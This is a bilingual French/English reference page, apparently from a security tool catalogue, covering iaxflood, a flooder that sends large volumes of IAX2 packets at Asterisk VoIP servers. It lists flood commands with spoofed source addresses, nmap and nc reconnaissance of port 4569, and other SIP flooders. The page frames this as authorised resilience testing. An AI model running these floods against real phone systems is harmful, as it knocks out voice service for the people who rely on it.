iaxflood
Générateur de flood pour le protocole IAX2 (Inter-Asterisk eXchange) destiné aux tests DoS VoIP. Inonde les systèmes Asterisk et IAX2 avec des paquets malformés ou en grand volume pour tester leur résilience. IAX2 (Inter-Asterisk eXchange) protocol flooder for VoIP DoS testing. Floods Asterisk and IAX2-based VoIP systems with malformed or high-volume IAX2 packets to test resilience.
↗ https://github.com/sipvicious/sipptsOverview
iaxflood is a VoIP denial-of-service testing tool targeting the IAX2 protocol, used by Asterisk PBX and other VoIP systems. It floods IAX2 servers with packets to test infrastructure resilience against DoS attacks.
Basic Usage
Basic IAX2 flood
iaxflood SOURCE_IP DESTINATION_IP NUM_PACKETS
Example: flood from spoofed source
iaxflood 1.2.3.4 10.10.10.1 10000
Flood with high packet count
iaxflood 10.0.0.1 10.10.10.5 100000
IAX2 Protocol Context
# IAX2 (RFC 5456) is the signaling protocol used by:
# Asterisk PBX (most common)
# FreeSwitch (optional)
# Some hardware IP phones
# IAX2 default port: 4569/UDP
# Check if target uses IAX2:
nmap -sU -p 4569 target.ip
# Or:
nc -u target.ip 4569
# Asterisk IAX2 check:
# asterisk -rx "iax2 show peers"
Testing Approach
Step 1: Verify IAX2 is running
nmap -sU -p 4569 -sV 10.10.10.1
# Step 2: Check Asterisk responsiveness baseline
# Call in from test phone, measure quality
Step 3: Run flood
iaxflood 192.168.1.1 10.10.10.1 50000
# Step 4: Measure impact
# Test calls during flood, check call quality and availability
Alternative VoIP Tools
For SIP flooding:
inviteflood eth0 target_extension target_domain target_ip 100
SIP stress testing:
sipp -sn uac target.ip -r 100 -l 500
IAX2 info gathering:
iax-scan 10.10.10.1 # if available
Tips
- IAX2 is less common than SIP but still widely deployed in Asterisk environments
- VoIP systems often have limited resources — even moderate floods cause quality issues
- Use authorized VoIP test systems — flooding production PBX disrupts phone service
- Monitor Asterisk logs:
asterisk -rx "core show channels"during testing - Rate limiting on the PBX is the primary mitigation for IAX2 flooding
Help / Man page
iaxflood SOURCE DESTINATION COUNT
SOURCE Source IP address (can be spoofed)
DESTINATION Target IAX2 server IP
COUNT Number of packets to send
Uses UDP port 4569 (IAX2 default)
Vue d’ensemble
iaxflood est un outil de test de déni de service VoIP ciblant le protocole IAX2, utilisé par Asterisk PBX et d’autres systèmes VoIP. Il inonde les serveurs IAX2 de paquets pour tester la résilience de l’infrastructure face aux attaques DoS.
Utilisation de base
# Flood IAX2 de base
iaxflood SOURCE_IP DESTINATION_IP NUM_PACKETS
# Exemple : flood depuis une source usurpée
iaxflood 1.2.3.4 10.10.10.1 10000
# Flood avec un volume élevé de paquets
iaxflood 10.0.0.1 10.10.10.5 100000
Contexte du protocole IAX2
# IAX2 (RFC 5456) est le protocole de signalisation utilisé par :
# Asterisk PBX (le plus courant)
# FreeSwitch (optionnel)
# Certains téléphones IP matériels
# Port IAX2 par défaut : 4569/UDP
# Vérifier si la cible utilise IAX2 :
nmap -sU -p 4569 target.ip
# Ou :
nc -u target.ip 4569
# Vérification Asterisk IAX2 :
# asterisk -rx "iax2 show peers"
Démarche de test
# Étape 1 : vérifier qu'IAX2 tourne
nmap -sU -p 4569 -sV 10.10.10.1
# Étape 2 : vérifier la ligne de base de réactivité d'Asterisk
# Appeler depuis un téléphone de test, mesurer la qualité
# Étape 3 : lancer le flood
iaxflood 192.168.1.1 10.10.10.1 50000
# Étape 4 : mesurer l'impact
# Tester des appels pendant le flood, vérifier la qualité et la disponibilité
Outils VoIP alternatifs
# Pour le flood SIP :
inviteflood eth0 target_extension target_domain target_ip 100
# Test de charge SIP :
sipp -sn uac target.ip -r 100 -l 500
# Collecte d'informations IAX2 :
iax-scan 10.10.10.1 # si disponible
Conseils
- IAX2 est moins courant que SIP mais reste largement déployé dans les environnements Asterisk
- Les systèmes VoIP ont souvent des ressources limitées : même un flood modéré cause des problèmes de qualité
- Utiliser des systèmes de test VoIP autorisés : flooder un PBX en production perturbe le service téléphonique
- Surveiller les logs Asterisk :
asterisk -rx "core show channels"pendant les tests - La limitation de débit sur le PBX est la mitigation principale contre le flood IAX2
Aide / Page de manuel
iaxflood SOURCE DESTINATION COUNT
SOURCE Source IP address (can be spoofed)
DESTINATION Target IAX2 server IP
COUNT Number of packets to send
Uses UDP port 4569 (IAX2 default)